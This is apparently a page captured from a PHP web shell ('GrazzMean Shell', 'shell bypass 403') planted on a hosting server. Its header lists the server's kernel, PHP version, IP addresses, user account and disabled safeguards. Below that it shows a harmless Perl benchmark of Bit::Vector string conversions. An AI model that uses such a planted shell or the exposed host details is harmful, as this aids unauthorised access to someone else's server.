shell bypass 403

GrazzMean Shell

Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.222.133.21
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : benchmk2.pl
#!/usr/bin/perl

use Benchmark;
use Bit::Vector::String;

$v = Bit::Vector->new(1024);

$v->Primes();

$s = '';

$b = $v->to_Bin();
$o = $v->to_Oct();
$h = $v->to_Hex();

sub to_Bin
{
    $s = $v->to_Bin();
}

sub to_Oct
{
    $s = $v->to_Oct();
}

sub to_Hex
{
    $s = $v->to_Hex();
}

sub from_Bin
{
    $v->from_Bin($b);
}

sub from_Oct
{
    $v->from_Oct($o);
}

sub from_Hex
{
    $v->from_Hex($h);
}

timethese
(
    10000,
    {
        to_Bin => \&to_Bin,
        to_Oct => \&to_Oct,
        to_Hex => \&to_Hex
    }
);

timethese
(
    10000,
    {
        from_Bin => \&from_Bin,
        from_Oct => \&from_Oct,
        from_Hex => \&from_Hex
    }
);

__END__

© 2025 GrazzMean